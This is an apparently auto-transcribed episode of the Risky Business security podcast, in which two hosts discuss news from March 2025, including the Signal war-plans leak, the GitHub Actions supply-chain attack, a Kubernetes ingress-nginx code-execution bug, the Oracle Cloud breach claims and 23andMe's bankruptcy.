Risky Business - Risky Business #785 -- Signal-gate is actually as bad as it looks
Episode Date: March 26, 2025On this week’s show Patrick Gray and Adam Boileau discuss the week’s cybersecurity news: Yes, the Trump admin really did just add a journo to their Yemen-attack-...planning Signal group The Github actions hack is smaller than we thought, but was targeting crypto Remote code exec in Kubernetes, ouch Oracle denies its cloud got owned, but that sure does look like customer keymat Taiwanese hardware maker Clevo packs its private keys into bios update zip US Treasury un-sanctions Tornado Cash, party time in Pyongyang? This week’s episode is sponsored by runZero. Long time hackerman HD Moore joins to talk about how network vulnerability scanning has atrophied, and what he’s doing to bring it back en vogue. Do you miss early 2000s Nessus? HD knows it, he’s got you fam. This episode is also available on Youtube. Show notes The Trump Administration Accidentally Texted Me Its War Plans - The Atlantic Using Starlink Wi-Fi in the White House Is a Slippery Slope for US Federal IT | WIRED Coinbase Initially Targeted in GitHub Actions Supply Chain Attack; 218 Repositories' CI/CD Secrets Exposed GitHub Actions Supply Chain Attack: A Targeted Attack on Coinbase Expanded to the Widespread tj-actions/changed-files Incident: Threat Assessment (Updated 3/21) Critical vulnerabilities put Kubernetes environments in jeopardy | Cybersecurity Dive Researchers back claim of Oracle Cloud breach despite company’s denials | Cybersecurity Dive The Biggest Supply Chain Hack Of 2025: 6M Records Exfiltrated from Oracle Cloud affecting over 140k Tenants | CloudSEK Capital One hacker Paige Thompson got too light a sentence, appeals court rules | CyberScoop US scraps sanctions on Tornado Cash, crypto ‘mixer’ accused of laundering North Korea money | Reuters Tornado Cash Delisting | U.S. Department of the Treasury Major web services go dark in Russia amid reported Cloudflare block | The Record from Recorded Future News Clevo Boot Guard Keys Leaked in Update Package Six additional countries identified as suspected Paragon spyware customers | CyberScoop The Citizen Lab’s director dissects spyware and the ‘proliferating’ market for it | The Record from Recorded Future News Malaysia PM says country rejected $10 million ransom demand after airport outages | The Record from Recorded Future News Hacker defaces NYU website, exposing admissions data on 1 million students | The Record from Recorded Future News Notre Dame uni students say outage creating enrolment, graduation, assignment mayhem - ABC News DNA of 15 Million People for Sale in 23andMe Bankruptcy
Transcript
Discussion (0)
Hey everyone and welcome to Risky Business, my name's Patrick Gray.
We've obviously got a great show this week, lots and lots to talk about, we'll get into
that in just a minute.
This week's show is brought to you by RunZero and RunZero's founder, HD Moore, will be along
in this week's sponsor interview to talk about why RunZero is going to be doing vuln scanning now and basically HD makes a compelling case that the incumbent vulnerability scanning
companies aren't really doing vulnerability scanning anymore. They're doing authenticated
scans and they're doing stuff on endpoints but in terms of being able to point a scanner
at like an IP range and get it to give you stuff to fix like it's not really what they're doing anymore they're not very good at that anymore
and RunZero is gonna step in and fill that gap so that is an interesting
conversation and it is coming up after this week's news which starts now and of
course we are gonna be talking about SignalGates unless you've been hiding
under a rock you would know that senior government officials in the United States planned a military action
against Yemen, against the Houthi rebels in Yemen
over a signal group chat.
And they accidentally invited an editor
from the Atlantic to the chat.
They accidentally added him
and it's turned into a big scandal.
Here's a look at how major media outlets reported on this.
How on earth did this happen? The Trump administration accidentally texted me its
war plans. That is how the journalist Jeffrey Goldberg summed it up.
He is the editor-in-chief of the Atlantic magazine and he's written at length about
what beggars believe. He accidentally received top secret war plans
from defense secretary Pete Hexsatt.
It is just shocking in several different ways.
This all happened on an encrypted text messaging service
called Signal, which is not approved
for sharing classified information.
Details so sensitive,
the reporter who accidentally received it all
opted not to publish them out of concern for national security.
So Adam, let's bring you into this now. Let's talk about this. And I mean, what do you even say here?
I mean, yeah, what is there to even say? It's been, it's actually really fun kind of watching this unfold because it's such an understandable story. Like normally when we're discussing, you know, deep cyber, you know, wonkery, it's not really very inclusive for the general
public. Whereas this one I think everyone gets. And there's just been such a great amount of,
you know, memes and hot tags and jokes, you know, way beyond just the regular, you know,
cyber security world. So it's been, it's been a fun ride. I mean, I managed to do a, do a really nerdy joke on this, which is, uh, why is everyone mad?
They were using a skiff, uh, signal chat in phone, uh, spelled with an F, but, uh, you know,
there's also new phone who this, um, you know, like lots of, yeah, the, the, the jokes, the
memes, uh, have been terrific, but we should break down like the story here.
I've got to say though, the coverage of this has basically been on the money from the major
media outlets.
They've very quickly honed in on the fact that the story here isn't that a journalist
was added to this group.
The story here is that the group existed in the first place.
One thing I haven't seen talked about that much is the fact that this would indicate
that there's probably a lot of other signal groups that we don't know about. One thing I haven't seen talked about that much is the fact that this would indicate
that there's probably a lot of other signal groups
that we don't know about.
And I'm sort of surprised to not see
the media seizing on that.
Yeah, I mean, clearly if they're doing it in one place
and this is kind of normal practice,
they're gonna be doing it in all sorts of places.
And you can kind of see why, right?
I mean, it's super convenient.
Everyone's got a phone in their pocket,
actually tracking down to the skiff is you know, is totally a pain.
So you can see why, but yeah, it's the, you know, it makes you wonder how much this is being used.
And, you know, clearly, you know, sharing information from, you know, it's one thing to be having conversations,
but also they were like, you know, copy pasting stuff.
And my question is, well, where were they copy pasting from? Maybe, maybe. And we'll get into that in a bit. But you're quite right that politicians and public
servants alike, they do use messaging apps like these, and sometimes in ways that aren't in
compliance with government regulations. And I personally think government regulations around
some of this stuff needs to change to just sort of better reflect reality, which is that a, you
know, a signal conversation might be the modern day equivalent of having a chat with someone in
the hallway.
It might not be something that needs to be subject to government record keeping requirements
and whatever.
And there's the whole other aspect to this, which is it's legally just iffy in the first
place because of records keeping requirements.
But if there is reform here,
under no circumstances would a principles committee
planning a military strike be allowed to use Signal, right?
So breaking down the story, obviously the news here
is that the Signal group existed in the first place.
I think the journalist involved, Jeffrey Goldberg,
did the right thing to a T, which is,
wasn't quite sure what was happening,
was added to this
group and thought it might have been some attempt to trick him and make him look stupid by reporting
on the data that was in there and then once they got closer to military strikes he like turned on
his radio and could turned on his radio and I think checked social media and saw that there
were reports of bombs falling exactly when this group said they were going to and at that point
left the group.
But we should probably talk about why
planning a military action over a signal group chat
is a bad idea.
And it's because the endpoints aren't secure.
Unquestionably, a lot of the participants in this group chat
were using their personal devices.
Now, America's adversaries would have already
been targeting those devices.
But now with a story like this in the open, knowing that they could access classified
information and that government business is being handled over these sorts of chats, you're
going to think they're going to redouble their efforts.
And further to that, you've got John Ratcliffe, you know, director of the CIA talking about
how Signal has been installed on his work computer.
So they're not just using the mobile app, you know, it's spread out onto other endpoints as well work computers maybe
some computer personal computers we don't even know and that's kind of a
problem yeah exactly because I mean you know given the alternatives of like
let's have this conversation on SMS text messaging which apart from the fact
that it's not really a grip medium clearly not desirable you know Facebook
messenger not great I mean if you're going to use an app, Signal, you know it's probably the right choice if
this was a right choice at all, which clearly it wasn't. But then yes the
linking it to other computers because I mean you know an up-to-date iPhone
pretty you know about as best as you're going to get them. Not if you're the
Secretary of Defense, but not if you're the Secretary of Defense Adam, come on.
Well yeah exactly like if the prices for you know prices for Apple bugs clearly have gone up over the years
But they're still achievable and people still sell them because they still exist
so yeah, it's not ideal and pushing it out onto computers just
Increases the amount of attack surface that you've got there by such a lot as well. So
of attack surface that you've got there by such a lot as well. So yeah, I mean the whole thing is
kind of concerning, kind of a mess, and even though Signal is best case, it's still just bad overall. No, best case is a skiff, right? Even Trump's come out and said that, but again we'll get into that
a little bit later on. But look, we've got government officials denying that classified
information was leaked into this
conversation.
Jeffrey Goldberg has made some comments that make that seem really unlikely actually because
apparently you had things like up to the minute weather reports and information on targets
like the human identities of targets, which weapons were going to be used to target them
and things like that.
So almost certainly classified information was leaked into this chat.
But then there is the question of the cut and paste, right?
Because the level of detail that Goldberg describes going into this group chat
kind of indicates that it's at least a possibility that there was some copying
and pasting going on.
And you would presume that that copying and pasting was taking place from a document that should have been on the airgapped high side of the network.
And that is an aspect of this, that if there were to be an inquiry, that is the part, that's the first question you'd want to answer.
Was high side info being copy pasted into a single group chat that was winding up on endpoints that you don't even control?
Yeah, and that's not a... endpoints that you don't even control.
Yeah. And that's just, that's not a, even the possibility of that is not great.
And you can just imagine how many people are grinding their gears at,
you know, Fort Meade and through all sorts of security agencies, thinking about like how many training sessions they've had to go to,
to learn not to do this and all of the rules and rigor and things
that they have to do in their everyday job,
all the inconveniences of managing sensitive information
and then seeing it just kind of yoloed like this,
it must just be super aggravating.
Now keep in mind too, the Houthis are essentially
in control of something, last time I checked,
which was a couple of months ago,
they control something, the areas where approximately 85% of the population of, in Yemen actually
live, right? So they are kind of the de facto government there now. And they are an Iranian
backed militia. They're an Iranian backed organization. So while the Houthis might not
have much of a cyber capability to go after, like government computers to try to read signal
messages and stuff, you know, the Iranians do, right?
So that's something to keep in mind.
So it is really, really bad.
What's been interesting is I heard Trump
on the radio this morning,
and he seems actually somewhat annoyed by this
and seemed to actually acknowledge
that this is extremely not great.
He talked about having been in the situation room previously
where other people were dialing in externally,
and he just said, terminate the lines, you know, that's not appropriate.
He said the best place to have these sort of conversations is in the Situation Room,
you know, preferably in a room lined with lead is what he was saying.
So he sort of, and it was funny because then he pivoted into an attack against the journalist
calling him a slimeball and you know, this sort of stuff, right?
So he sort of oscillated between acknowledging that this was not great, also said that they wouldn't be using Signal
as much in the future.
So he sort of seemed to acknowledge that this was an issue
while also going on the attack,
which is, you know, very Donald Trump of him.
Pete Hegseth, interesting thing there was he did a,
you know, he did some comments to camera
where he tried to do the Trump thing
of attacking the lying media and whatever, and it just doesn't work when he does it, you know, he did it, he did some comments to camera where he tried to do the Trump thing of attacking the lying media and whatever, and it just, it just doesn't work when he does it,
you know, like no one can quite carry that like, like Trump. But yeah, I mean, there's many layers
to this. There's the record keeping requirements side of it. There's the general sort of fast and
loose with classified info side of it. There's the, I mean, it's just, you know, it's a little
bit different to similar scandals we've seen in the past with like Hillary Clinton's emails, which did not involve real time planning of
military action.
You know, we have seen politicians sort of get caught doing this.
We had another instance where a German military figure was dialling in from an insecure line
into some sort of, I think it was a Zoom call, like a, you know, gov, gov grade zoom call or whatever, but could only dial in and was discussing details,
limited details about delivering Taurus missiles to Ukraine for them to use
against Russians and that call was intercepted. But again, it wasn't like, okay
they're gonna be in these trucks on these roads at this time. This just seems
really bad and absolutely not the sort
of stuff you would want in a group chat.
The fact that they accidentally included an editor at the Atlantic is just the cherry
on top here.
It's such a beautiful thing.
Oh boy.
I wondered actually when I read some of this, like I wonder what Moxie, Moxie Marlinspike,
who did a little bunch of the work on Signal and developing it originally, And he's kind of a hippie, kind of a punk. I wonder how he feels about
Signal being used accordingly. Well he was on social media the other day
posting a yesterday, posting a guide to how to make sure you're not accidentally
adding the wrong people to your Signal group chats which was pretty funny.
Hey just a reminder folks, here's a guide that we wrote. Yeah, dear oh dear. Honestly, I think it's been a great story just because it's so accessible
for everybody else outside our sphere. And I think this is a good reminder for everybody
about how Opset works and keep an eye on the group chats and thinking about where you're
talking about these kinds of things. So I you know, I, you know, I can't imagine we'll see much change beyond a little bit less use of Signal and USGov,
but, you know, it's been, it's been a fun ride.
Yeah. I mean, I think probably the one aspect to this that's been misreported
though, is people are sort of left with the impression that Signal's very secure
and there's not much of a risk because everything's encrypted. And of course,
some stories are even now updating saying, well, while the messages are not likely to be, you know, intercepted in transit, obviously there is a problem if
a hacker is able to gain access to one of the endpoints on those computers. So I think
that that part has kind of been lost. But yeah, this is really, I think there's a lot
of listeners, or some listeners, at least to this show, who would be wondering whether
or not this is a big deal and whether or not this is as bad as it looks. And it actually is. This one actually is.
Yeah, it totally is. And I guess the good thing is people will learn some lessons from
it, I guess, from the fallout.
I think even Trump said that his national security adviser had learned a lesson here.
So I just found it interesting seeing Donald Trump
acknowledge that this was not ideal, right?
Because that's not his normal style.
No, you have to really screw up before you get that out of him.
But again, the issue here is that this isn't going to be the only group chat.
You wonder what else they're doing and you wonder what the security of the endpoints
where this stuff is winding up is and they need to rein it in.
They definitely need to rein it in.
And then there's the record-keeping stuff, and yeah, just top to bottom, a bit of a cluster,
as they say.
And just, you know, in the same theme, we spoke previously about some of this Doge stuff
and how it was a data governance concern, because we weren't sure if people were being
careful and whatnot.
And this sort of feeds into all of that, as does this next story.
Lily Hay Newman has it for Wired.
Apparently figures at the White House are like slapping Starlink dishes on the roof
to like boost the Wi-Fi on the White House campus.
And again, probably not ideal.
No, certainly not ideal from a,
you know, kind of like it's just shadow IT, right?
And shadow IT, any workplace is going to cause you trouble.
And doing this in the White House seems extra dumb, especially when, you know, the point
of styling is to service regions where you have not great coverage.
And clearly, you know, both mobile and wired network coverage in the White House is probably
pretty good.
Like their Wi-Fi might be crap, which, you, which we've seen a few people complain that that is the
case.
But I think one thing I thought was funny was it's not like the dishes are on the roof
at the White House.
They're at the White House data center and then they run over fiber to the actual White
House, which...
This doesn't make any sense.
It doesn't make any sense.
It just smells like Elon and Trump going, yeah, let Elon do whatever the hell he wants.
And now there's a, you know, Starlink terminal serving the White House.
But yeah, it just seems a little bit bonkers.
And again, there must be so many aggravated people that work so hard, you know,
on doing these things like both procurement and technical installation and so on and so forth,
in the right way. And then you see this and it's just, you know, kind of an affront to your profession.
This one is like, it's not the end of the world, right?
Because Wi-Fi, it's all unclassed, whatever, right?
Like it's not ideal, but it's not the end of the world.
And it's kind of weird.
Whereas that previous story we're talking about is like, Oh my God, what are you doing?
This is, this is, you know, critically dumb.
Uh, so yeah, just, but they both come from the same place,
which is to sort of throw a convention out the window and just do it the easy way.
And, you know, move fast and break things, right?
This is a move fast and break things government.
And, you know, that's what all of that looks like.
All right. So we're going to move on to other news.
And we've got an update here about the GitHub action
supply chain attack that we spoke about last week. So new stuff has come to light
like you know you and I absolutely not GitHub experts right and we were sort of
speculating a bit last week about like GitHub actions and like what they can
actually do. Since then I've had listeners write to me and say look
they're just glorified bash scripts right if the if the attackers wanted to
they could have absolutely
exfiltrated this information.
They did not need to write it into build logs as they were.
I've had other people write to me and say that we missed it
because no one was going to notice this information
in the build logs in the first place, so it was pretty smart.
I'd kind of counter that by saying, well,
obviously someone did notice, which is
how we know about all of this. So what there is to update here on, for those who
missed it, it just meant that, you know, someone backdoored essentially a popular GitHub action,
which when they used it would scrape the memory of their build server for tokens and sensitive
stuff. They would base 64 encoded and crap it out into the build log,
which would be public for public projects. So the attacker could come back and then obtain
that secret material. So the update is that it looks like only a couple of hundred projects were
affected because I think maybe only a couple of hundred ran that build log. And it looks like
this was part of a supply chain attack that previously was targeting Coinbase,
which is interesting. So it looks like maybe maybe crypto thief type stuff here.
Yeah, yeah, it does feel that way. We've seen the thread kind of pulled as to how people
got access to the action. So it looked like there was another upstream action that itself
got compromised and then access token for that was used to write into the one that we
were talking about last week. But yeah, some of the changes early on in this process, once
we've started to see the whole timeline, did look like it was specifically targeting an
integration toolkit for like AI and blockchain that Coinbase work on. And that was what they
were actually trying to achieve. And it looks like they did in fact get tokens out of that particular project, whether or
not those tokens were useful.
Most of the tokens apparently were like time-limited ones used by the build process that stopped
being valid after it finished.
But yeah, it looks like smaller scale than we thought, but not 100% sure whether it then
resulted in them getting towards the target that they were going for,
which was this code base from Coinbase.
Yeah, so it looks like this is essentially something
that got caught in time.
Pretty clever stuff though, and it just has to be repeated
that crypto, cryptocurrencies have done a lot
for the state of attacks, right?
Of the type of attacks that we see in, in public, because, you know,
they're always interesting, right? You've got supply chain attacks. Uh,
you've got, I mean, the, uh, what was it?
The by-bit thing was just fascinating. Like, yeah. I mean,
can you imagine going up against adversaries who do this? Like they're really clever.
Yeah, yeah, absolutely. That's great motivation. And, you know, there's also
the aspect of that we get to see more of these attacks because of the publicity
of the blockchain, right? When it finally gets to action on objectives of
stealing crypto, we then get to pull the thread backwards to see how it worked.
Whereas in so many other attacks, we don't really have a way to pull that
thread and see, you know, what this tradecraft looked like and how the targeting worked.
And so, yeah, it's kind of, you know, of all of the dumb things that crypto has done for
us, you know, the way that it has pushed both the state of the art of attacking and also
unraveling attacks forward, I think it's good for us.
It certainly is.
I mean, it's like I find myself most stimulated by reading the incident reports on this stuff
You know, it keeps life interesting. We've been doing this a long time, right?
So we got to say like, you know, keep it going. Keep it going.
I mean, lolsec was more fun, but this is still good.
Yeah, yeah. Well, this is better hacking, right? lolsec was SQL map and Jake Davis writing funny.
Yes, better comedy.
Better comedy.
Better comedy, that's true.
All right, so now we're going to talk about a bunch of CVEs,
like a bug chain, in something called Ingress Engine X
Controller for Kubernetes.
And it's rare for us to, although not so much lately,
we've been talking about a few bugs lately in the news
segment quite close to the top, because there've been some doozies.
But this is a terrible bug chain
with a like near 10 out of 10 CVSS,
which is gonna impact thousands, thousands
of Kubernetes clusters around the world
that are attached to the internet
and vulnerable to this.
Walk us through it because this is bad.
It is, it is.
So researchers from Wizz pulled together this bug chain. I don't think they've
seen it in the wild. I think this was independent research. And so Kubernetes is kind of a cloud
orchestration system where you have a bunch of compute that you want to run jobs on and then
Kubernetes lets you orchestrate all the involved computers, the network connections, and the kind
of plumbing in and out. And Kubernetes is a big jumble of components,
and you can kind of pick and choose which components you
use to build your particular instance of a cluster.
One of the bits of functionality is kind of for setting up
paths into the cluster from the outside.
So if you want to expose a web server running inside your,
the application running inside your cluster to the outside, there's a way of kind of plumbing it through from the outside. So if you want to expose a web server running inside your, you know, the application running inside your cluster to the outside, there's a way of kind of plumbing it
through from the network edge into the middle of the virtual compute. And the Nginx Ingress
Controller is one piece of software that you can use to kind of do a part of that process.
And it uses the Nginx Reverse Proxy to kind of implement this network plumbing.
and it uses the NGINX reverse proxy to implement this network plumbing. So what they found was that when you are deploying this configuration into your cluster,
there is a process by which this NGINX controller will validate the configuration.
The overall plumbing generates configuration files to be fed to NGINX
so that NGINX can implement the network plumbing it needs. And that process of testing
configurations turned out you could inject into that configuration file that's being built and
leverage behavior of NGINX to do things that the attacker wants to do. And through all of this,
what Wizz did was they basically found a way to write files to disk,
like by starting a file upload and then not finishing it.
So is this all pre-auth?
So in this case, yes, this is pre-auth.
I don't know that it needs to be pre-auth, but you could reach the Ingress controller pre-auth in the common configuration. So they would do a file upload and then they would submit
a configuration for testing that would load an external module, so a shared object file on Unix,
DLL and Windows, but you know in this case a shared object file that lets you run arbitrary
code. So by the power of kind of a midway through file upload and then being able to inject into the
configuration file, they leverage that upwards into arbitrary code exec. So this is in the wrap-up,
you know, CVSS 9.8 code exec in a privileged spot in your Kubernetes environment. Because of
the privilege that these ingress controllers need, it's roughly equivalent
to having full access to the cluster. You can steal enough tokens to go
onwards to great victory and so yeah it's a this is a good bug. The whiz
researchers do point out that there you could probably exploit this via
service-side request forgery or any other mechanism you can use to kind of
make a web request from inside the cluster. So the remote
unorth from the internet having you do this is one, but also anywhere where you can kind of
originate a web request inside the cluster, which let's face it, is pretty damn common.
Yeah, yeah, yeah.
That point you'd be more than just an edge network control.
No one's doing the right sort of filtering on those sort of requests, right, to stop them
rattling around inside. So, no, it's just, you know,
Kubernetes is so complicated.
Like all of those kinds of cloud in a box sorts of things are really complicated
and mapping the network flows inside them is complicated.
And yeah, yeah.
Now it looks like there's been some sort of data breach at Oracle cloud affecting
something like six million records from 140,000 tenants. Oracle came out and said no this is all nonsense and then the
researchers at CloudSec who were talking about this brought some receipts.
Yeah this is not great it looks like someone had some kind of either code exec
or file read on the SSO system for Oracle's Cloud Edge.
I don't really know how Oracle is claiming that this wasn't
a data breach of some sort, but the researchers at CloudSec
correlated the data they had with some tenants,
with public records of those tenants URLs,
and indeed found some people who could confirm that those
were the correct credentials.
So the hackers appear to have got like a Java key store files
and other kind of credential material from the SSO system.
And that's just not good.
Cause you know, there's like thousands of customers
and you know, I don't know how many important things
are on Oracle's cloud.
I don't know if TikTok's there yet, lol.
But yeah, it's just not good.
Yeah, no, so I think that's a decent summary.
Not good.
It's not good.
It's not good.
And speaking of attacks targeted towards
major cloud platforms, Paige Thompson,
who was the Capital One hacker,
and the reason I mention this as a cloud thing is because she was abusing the AWS metadata service, right? Like an old
version to do this attack. You know, when she was sentenced to time served in five years
probation, we even said at the time that we were really surprised that that sentence was
handed down, right? That it was so lenient. And a federal's appeals court has now overruled
that sentence and it looks like she's off for re-sentencing.
So yeah, probably not a great time to be Paige Thompson.
Yeah, yeah, I mean, I imagine, you know,
it probably isn't a great time at any point
in the last couple of years
because it's certainly been a mess, but yeah.
I mean, on the one hand, you know,
you feel for being transgender in the US full stop at the
moment, let alone going through the courts and through the incarceration system like
this.
But at the same time, she was kind of gloating about this and encouraging people to hack
the customers and stuff.
So I can kind of see, you can kind of see both sides of the decision here.
So yeah, we'll see what the resending looks like.
Yeah, the original judge in 2022 said the hack wasn't done
in a malicious manner and that Thompson was tormented
about her activities, noted that she's transgender,
autistic and had suffered past trauma.
So I think the judge, I think by the looks of things,
just felt for her, but yeah, could be.
I'm probably expecting some prison time there. Let's see. Now, this is an interesting one. US Treasury has dropped
its sanctions on tornado cash. Now, tornado cash, of course, is a cryptocurrency mixing
service, which runs without it runs on the blockchain. No one's really controlling it
anymore. But it is subject to sanctions. so you're not allowed to interact with it basically
you will fall afoul of US sanctions interacting with it.
The people who actually created tornado cash and who receive profits from people putting
money through it have all been charged with various money laundering offenses but it looks
like what's happened is
some people who use tornado cash
filed a suit to challenge the sanctions.
And it was backed by, the lawsuit was backed by
one of the cryptocurrency exchanges,
I can't remember which one.
But it looks like they succeeded
and the courts decided that
Treasury had overstepped its authority
in sanctioning tornado cash
because it's not actually being operated
by a foreign hostile government, right?
So they said, no, you can't sanction it.
Looks like Treasury has looked at the ruling,
done its own analysis,
and maybe not gonna appeal this
because they've actually removed the sanctions.
So good news if you're a North Korean money launderer.
Yeah, I mean, you can kind of see why the technicalities of this are a little fiddly,
but at the same time the outcome, which is apparently it's fine to just use tornado
cash to launder your crypto if you're DPRK or anyone else.
I guess the DPRK entities are still sanctioned in many cases, but yeah in general the fact that
You could just money launder with it. Yeah doesn't seem like a great outcome money laundering is okay now
Yes, the charges though against the people who started tornado cash. They have not been dropped right and and we'll see
I mean, I'm guessing their lawyers are gonna be all over this and they're gonna try to see if they can turn this into
A break for their clients, but yeah, I wouldn't hold lawyers are going to be all over this and they're going to try to see if they can turn this into a break for their clients.
But yeah, I wouldn't hold my breath necessarily if I were them.
Now, what's going on with Cloudflare in Russia?
Because it looks like Cloudflare got temporarily blocked and that this may have been a warning shot from the Kremlin. Yes, so they got added to a list of services that weren't complying with Russia's rules
about local data retention and deception and so on.
Being added to that list doesn't necessarily mean that you're automatically blocked, but
clearly someone at Roskomnadzor or whatever else decided that they were going to go implement
it. There's quite a lot of Russian customers for Cloudflare,
both international properties, but also domestic stuff.
And some of the Russian internet commentary has been suggesting
that this might be a warning shot to discourage local customers
and to encourage them to use alternative, you know, Russian
equivalent DDoS protection or, you know, front-end services like CloudFlare.
Obviously CloudFlare is not going to comply with Russia's rules for storing
data domestically and handing them over to the Russian government, so, you know,
clearly if you are a Russian user of it, probably it is time that you got off
that platform. Yeah, it'd be interesting to see if people actually do though, right?
Well, yeah. I mean, cause you know, cloudflare has, you know,
they're quite good at what they do and hiding
in the morass of other cloudflare customers is part of the point of that.
You know, you can...
Strengthen numbers, right? Like you can't ban at all.
You know, that's the whole point, right?
So I'll be... I'm just curious to see if the Russian government can make this happen.
I would be actually kind of surprised if they can get everyone off Cloudflare
without having to cause major disruption and do perhaps a longer block.
Now, we've got a great one here, great bit of research from Binalee.
I guess you would pronounce it like binary, Binalee,
where they found a UEFI keymat leak, basically.
Walk us through this one.
Yeah, so they identified on a forum somewhere
that someone was posting about,
hey guys, it looks like this private key material in this BIOS, can we use it to make a BIOS that
loads CoreBoot, which is like an open source, you know, alternative BIOS implementation.
And so, by Nali Winton had looked at it and it turns out that there's a vendor called Clevo, or Clevo, who make kind of bare bones laptops, I guess.
So laptop chassis, which are then reused
by a whole bunch of other manufacturers
to sell their laptops.
So if you buy a like gigabyte branded laptop,
what you're actually buying is a Clevo manufactured device
that the actual model number and specs
have been then added on by
by gigabyte. And so Clavo provide the underlying BIOS for these systems and it
looks like when they zipped up this particular BIOS update they just left
the private key files in zip. So that's not great. So Binale went and looked
through their archive of
bioses and various things to figure out which actual systems matched the public
and private keys that were stored in those things and identified something
like, you know, 15 firmware images corresponding to 10 laptops, mostly
gigabyte devices that, you know, matched the key material. So, yay, that's good, I guess.
I mean, it's great for the SIGINT operators
who are listening to this, who want to get some real
persistence on a gigabyte branded laptop, I mean.
Well, exactly, yes, yeah.
And the open source hippies, they want to run their own
BIOS and so on and so forth.
But yeah, it just underscores the complexity of managing
hardware anchored trust routes in the open ecosystem
that is PC hardware versus a closed environment
like Apple or Cisco hardware or whatever else.
Yeah, yeah.
Now we've got a report here from Cyberscoop.
This one's done the rounds at a whole bunch of outlets.
I think it was, was it CitizenLab who did this report?
Yeah, it was CitizenLab looked at Paragon spyware, right?
To try to identify more countries
that were actually using it.
And it looks like they found that in Australia, Canada,
Cyprus, Denmark, Israel, and Singapore.
I actually got a message from an Australian journalist,
like a not cybersecurity journalist.
Hi, if you're listening, I won't name you,
but yeah, they were asking me like, oh, what do you think about Australia being a
customer of Paragon? And I just thought, well, you've got to get your spyware
from somewhere, right? It's like, this is a major player that seemed to respond
well when it was, you know, revealed that the Italians had been abusing it.
They immediately ceased any contracts with Italy.
I just sort of feel like, you know, it's great to have this sort of information
on the record, but you know, as an Australian, I'm not particularly worried
that Australia is a customer of Paragon, given the way that this stuff is used
in Australia, it's overseen pretty heavily.
Like the oversight is good, the court oversight is good, the government
oversight is good, so I don't know that there's much to say here.
Yeah, I mean, I went and read the actual research
out of a certain lab, and the way they did this
was by looking at trying to build fingerprints
for some of the devices involved.
And like many of these spyware systems,
there's kind of a couple of tiers of servers
that handle the initial contact
and then subsequent Spire installation.
And so they kind of looked for SSL certificate fingerprints
and other kind of fingerprinting aspects
and pulled those threads combined with historical records
over time to try and identify where these systems were,
and then tie that back to address ranges and customers.
And one of the more concrete ones they found
was links back to the Ontario Provisional Police
in Canada, for example.
But overall, this is still kind of suggestions rather than it being like direct links or
direct evidence.
But still, I mean, it's really solid research and the sort of thing that Citizen Lab is
well equipped to do.
But I mean, as you say, like other than, you know, telling your Aussie journal mates that maybe the Australian government should buy local, you know,
buy local spyware instead of imported foreign stuff. But yeah, I mean, you know, as you say,
it's got to come from somewhere if they want to have that capability and better they buy it off
the shelf than spend way more money trying to develop this capability badly in-house.
Yeah. And I think, you know, from everything that we've seen,
we just don't have any sort of concerns around the abuse of this stuff here.
Like, famously, when Gamma Group got hacked
and all of their help desk tickets wound up being leaked,
I think the funniest thing that happened there was,
was the tickets from the Australian authorities
were all about, like like them getting mad with
Gamma Group who made, what was it, FinFish or FinSpy or whatever it was, getting mad
at them because they couldn't do as granular filtering as they would like to exclude intercepting
material from their targets, like talking to their lawyers and stuff like that.
So that was the stuff that they were lodging tickets over
was like, we need to better comply with the warrants
that we've been given by the courts to do this action,
which was really reassuring,
seeing, I think it was New South Wales police
actually lodging those tickets saying,
come on, you gotta help us to do better exclusions here
because we don't wanna get in trouble with the court.
And that's the way it should be.
Yeah, agreed.
Speaking of Citizen Lab, they've
got a great Q&A with the founder, Ron Debut, and it really just does go into how they do a lot of
this research and what their day-to-day process is for trying to look at spyware samples and examine
the infrastructure and do attributions and whatnot. It's a really good Q&A.
Yeah, no, it's a good interview.
I think Ron Debert is out there promoting a book
that he's written, released earlier on this year,
talking about kind of how Citizen Lab came to be
and the work that they do.
And you know, it's kind of interesting
because I hadn't really, you know,
I'd never really thought about the history of Citizen Lab,
like how they came to be where they are
and now the two kind of original guys they came to be where they are and now the
two kind of original guys work together to do what they're doing. So yeah, definitely good interview. I haven't read the book yet, but I've added it to my list of things to read.
There you go. And that one was done by Suzanne Smalley over at The Record. And yeah, nice work
because that was a really good Q&A. Now we've got a report here, another one from The Record.
John Greig has reported that the Malaysian Prime Minister had
just rejected a ransom demand when there was a ransomware attack against the
major airport in Malaysia. It's nice to see, I mean he had some pretty
strong comments just saying, there's no way this country will be safe if
its leaders and system allow us to bout her ultimatums by criminals and traitors, be it from inside or outside the country.
I think that's fair enough, but I also think there's situations where there's no other
choice.
Thankfully, it doesn't look like this was one of them, although it looks like they were
like doing a lot of stuff at that airport on whiteboards and whatnot, just to keep going.
Yeah, yeah.
I mean, there are alternatives, but that alternative is some guy who has to stand in front of a whiteboard
constantly writing flight information all day long, and his hand must be very sore at the end of the day.
Catalan actually has a picture of the whiteboard in question in today's Risky Bulletin.
So if you want to see it, you can click through and have a look at that, yeah, it's I feel I feel bad for that guy
Yeah, we've also seen a major hack at NYU New York University someone obtained data on millions of
Students there and you know claim to be posting the data to prove that NYU was doing admissions that favored
black people in Hispanics last year in contravention of a Supreme Court ruling that essentially ended affirmative action in the United States.
So the group has a racist name as well.
So yeah, ew, yuck.
And meanwhile, in Perth too, I mean, it's a small university, I guess in the grand scheme
of things, but Notre Dame University in Perth has been going through an incident that is just causing like all sorts of drama for the students and staff.
So I've linked through to that one in the show notes. And finally, Adam, we're going to end on this story.
A number of outlets are reporting on it, but we've linked through to the 404 media report on it by Jason Kobler, which is 23andMe has filed for bankruptcy protection and is selling itself,
trying to find a buyer, a new home for the company, which means the DNA information of
15 million people is now up for grabs, which is a very 2025 dystopian cyberpunk future
sort of thing to wrap your head around.
Yeah, yeah, it really is.
I mean, and like, you know, it's one thing to lose your privacy,
one thing to lose your password, but losing your genetic information? Like, what are you
supposed to do? Like, go change your genes at a genetic clinic? That's probably also
going to get hacked. But yeah, very cyberpunk, unfortunately. And I guess, yeah, the advice
that the California Attorney General was saying is like, if you have used 23andMe and you still have your account credentials,
log in and ask them to delete it now while you still can, because once they've sold it,
then who knows what it's going to be used from. We have seen other companies that have
collected genetic information, you know, that have subsequently sold the data and we've
seen it being used for, you know for other things that were not intended.
Well, I think one of the points though here is that it doesn't matter if you've been
a customer.
I mean, anyone who's related to you and I, you know what I mean?
If they've done it, I mean, that is a degree of exposure.
I think it's very interesting to see that these services have been used for crime fighting as well.
And, you know, really hard to blame the cops for taking DNA samples and just sending them into 23andMe
to see if they get any matches, which is what they've done previously.
But yeah, it's kind of nuts, right?
That that store of data is just going to wind up who knows where.
Could be private equity.
